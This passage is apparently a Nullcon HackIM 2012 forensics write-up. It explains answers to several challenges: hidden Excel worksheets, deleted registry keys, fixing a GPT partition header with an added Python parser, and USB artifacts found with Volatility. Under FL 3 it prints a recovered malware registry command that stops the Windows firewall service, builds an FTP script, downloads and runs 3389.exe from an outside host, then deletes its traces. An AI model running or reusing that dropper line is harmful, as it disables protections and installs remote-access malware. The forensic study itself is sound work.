How to: Provided is a doc file. After dumping the strings and going through them, the suspicion arises that the provided file is an XLS. Renaming the file extension and opening it in Excel gives us 1 worksheet named Nullcon. From the text on the page, we are sure that we are heading in the right direction. From the strings we also know that there are actually 3 worksheets. From googling it was found that Excel can have hidden worksheets, which can be uncovered by pressing ALT+F11 to launch the VB editor (which is used for macros). The hidden worksheet has our flag.
FL 3:
Q. Not Guilty!
A. Shell
REG_SZ
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
How to: Using reglookup-recover recovers the deleted registry keys.
http://manpages.ubuntu.com/manpages/jaunty/man1/reglookup-recover.1.html
FL 4:
Q. Intriguing MBR
A.
How to:
Tools needed: http://www.garykessler.net/software/index.html
Info: http://en.wikipedia.org/wiki/GUID_Partition_Table
The first run of GPTparser says that there are 0 partition tables.
So now we know that the number of partition table entries is located at offset 592 (80+512). Now the question is how many table entries there are in this given image. To get that info, open the given file in a hex editor and you can easily see a pattern. Count the number of patterns and you have the number of partitions as 9. Now change byte 592 (0x250) to 9 and parse again with GPTparser.pl.
After parsing the modified file, you get a list of partition info with LBA addresses. The only thing now to do is arrange them in increasing order of LBA, find out the partition type from the GUID given by the parser (match it with the wiki article) and you have the flag.
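A minimal GPT parser in Python, as an added example (not the write-up's code and not GPTparser.pl). It reads the entry count at byte 592, lists the entries sorted by first LBA and labels a few well-known type GUIDs; build_demo_image() constructs a small test image whose header advertises 0 entries, mirroring the situation in the write-up, and patch_entry_count() applies the same fix.

```python
import struct
import uuid

# Minimal GPT parser for HackIM 2012 FL 4 (added example, not the write-up's code).
# The header at LBA 1 (byte 512) carries the partition entry count at header offset 80,
# i.e. byte 592 of the image; entries are 128 bytes each, starting at the LBA named in
# the header (normally 2). GUIDs are stored mixed-endian, hence uuid.UUID(bytes_le=...).
SECTOR = 512
ENTRY_SIZE = 128
# Well-known partition type GUIDs used for labelling (only these three; others print raw).
TYPE_NAMES = {
    "c12a7328-f81f-11d2-ba4b-00a0c93ec93b": "EFI System",
    "0fc63daf-8483-4772-8e79-3d69d8477de4": "Linux filesystem",
    "ebd0a0a2-b9e5-4433-87c0-68b6b72699c7": "Microsoft basic data",
}


def parse_gpt(image):
    """Partition entries sorted by first LBA; [] when the header's count field says 0."""
    hdr = image[SECTOR:SECTOR + 92]          # GPT header lives at LBA 1
    if hdr[:8] != b"EFI PART":
        raise ValueError("no GPT signature at LBA 1")
    # header offset 72: entries LBA (8), 80: entry count (4), 84: entry size (4)
    entries_lba, count, entry_size = struct.unpack_from("<QII", hdr, 72)
    parts = []
    for i in range(count):
        off = entries_lba * SECTOR + i * entry_size
        type_guid = uuid.UUID(bytes_le=image[off:off + 16])
        if type_guid.int == 0:
            continue                         # unused slot
        first, last = struct.unpack_from("<QQ", image, off + 32)
        name = image[off + 56:off + 128].decode("utf-16-le").rstrip("\0")
        parts.append({"first_lba": first, "last_lba": last, "name": name,
                      "type": TYPE_NAMES.get(str(type_guid), str(type_guid))})
    return sorted(parts, key=lambda p: p["first_lba"])


def patch_entry_count(image, count):
    """Overwrite the entry count at byte 592 (0x250), the field the write-up fixed by hand."""
    return image[:592] + struct.pack("<I", count) + image[596:]


def build_demo_image(entries, advertised_count):
    """Constructed image: blank protective-MBR sector, GPT header at LBA 1, entries at LBA 2."""
    table = b"".join(
        uuid.UUID(t).bytes_le + uuid.uuid4().bytes_le + struct.pack("<QQQ", f, l, 0)
        + n.encode("utf-16-le").ljust(72, b"\0")
        for t, f, l, n in entries)
    hdr = b"EFI PART" + struct.pack("<IIII", 0x10000, 92, 0, 0)    # revision, size, crc, reserved
    hdr += struct.pack("<QQQQ", 1, 0, 34, 0) + b"\0" * 16            # LBAs and disk GUID (zeroed)
    hdr += struct.pack("<QIII", 2, advertised_count, ENTRY_SIZE, 0)  # entries LBA, count, size, crc
    return (b"\0" * SECTOR + hdr.ljust(SECTOR, b"\0") + table).ljust(SECTOR * 4, b"\0")


# Constructed entries, deliberately out of LBA order like the parser output the write-up had to sort.
DEMO_ENTRIES = [
    ("0fc63daf-8483-4772-8e79-3d69d8477de4", 4096, 8191, "data"),
    ("c12a7328-f81f-11d2-ba4b-00a0c93ec93b", 34, 2081, "esp"),
    ("ebd0a0a2-b9e5-4433-87c0-68b6b72699c7", 2082, 4095, "win"),
]

if __name__ == "__main__":
    img = build_demo_image(DEMO_ENTRIES, advertised_count=0)
    print("as found:", parse_gpt(img))
    print("patched :", [(p["first_lba"], p["type"]) for p in parse_gpt(patch_entry_count(img, 3))])
```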
FL 5:
Q. Universal Swindlers Bayonet
A. 2GEL32TN
05/01/2012 18:54:36
06/01/2012 17:52:13
mshearts.exe
How to: Volatility to the rescue. Finding the first 3 flags is trivial, as we can dump every registry hive and look for USBSTOR to find them. You have to change the time to IST (add 5:30) and format it properly. For the last flag, I dumped the process nullcon.exe and ran strings over it to find a list of exe names, and brute-forced the suspicious ones to find mshearts.exe as the right one.
https://www.volatilesystems.com/default/volatility